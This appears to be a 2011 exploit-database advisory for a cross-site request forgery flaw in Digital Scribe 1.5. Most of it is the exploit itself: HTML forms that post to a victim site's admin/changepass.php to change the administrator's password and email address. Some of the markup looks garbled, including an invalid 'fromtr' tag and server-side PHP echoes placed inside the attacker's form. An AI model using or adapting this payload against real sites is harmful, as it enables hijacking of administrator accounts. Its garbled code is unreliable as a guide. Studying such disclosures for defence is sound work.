Digital Scribe version 1.5 suffers from a cross site request forgery vulnerability.
d89220e612658209a0a53bf2f07815e4783ae69c51cc994725f7bf68d71fc8c9
Digital Scribe v1.5 CSRF Vulnerability
Author : Muhammet Cagri Tepebasili
Date : 11.11.2011
Script Homepage and Download : http://www.digital-scribe.org/
Version : 1.5
Tested on : Linux Mint 11
Exploit :
<fromtr>
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/
changepass.php>
<BR>New Password: <INPUT TYPE=TEXT NAME=pass>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=submit VALUE="Update">
</form></td></tr></table>
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/changepass.php>
<BR>New E-mail: <INPUT TYPE=TEXT NAME=emailad VALUE=<?php echo "$emailad";
?>>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=chng_email VALUE="Update">
</form></td></tr></table>
</fromtr>
Greetz : Eymen Sen and Cafer K.Sezer